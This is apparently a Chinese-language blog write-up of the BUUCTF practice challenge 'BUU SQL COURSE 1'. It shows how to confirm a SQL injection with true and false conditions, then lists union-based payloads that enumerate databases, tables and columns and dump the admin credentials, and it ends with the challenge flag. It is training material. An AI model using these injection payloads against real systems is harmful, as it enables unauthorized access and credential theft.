我得把ctf方向这个学期的ddl赶完

本篇文章记录一下做的buu上面的题(荔枝超过巨魔

实际上主要缘由是这个学期的ddl要完不成了,赶一赶赶一赶~

Basic

BUU SQL COURSE 1

考点:sql注入

随便点一个新闻,看网络流量

这里有一个php请求,试图构造sql注入

把尾部改成?id=1%20and%201=1,正常回显;把尾部改成?id=1%20and%201=0,就不回显了

说明存在sql漏洞

之后经典流程,暴库、暴表、暴字段、爆密码

1
2
3
4
5
6
7
8
9
10
11
暴库:(information_schema,ctftraining,mysql,performance_schema,test,news)
?id=-1 UNION SELECT 1,group_concat(schema_name) from information_schema.schemata

暴表:(admin,contents)
?id=-1 UNION SELECT 1,group_concat(table_name) from information_schema.tables where table_schema="news"

暴字段:(id,username,password)
?id=-1 UNION SELECT 1,group_concat(column_name) from information_schema.columns where table_name="admin"

暴密码:(d0bf08276910ee0b09cdc8baf32cd748)
?id=-1 UNION SELECT 1,concat(username,0x3a,password) from admin

得到密码后登录,得到了flag

flag:flag{bb3ecb94-8696-4dc3-868c-c6fdf479ed63}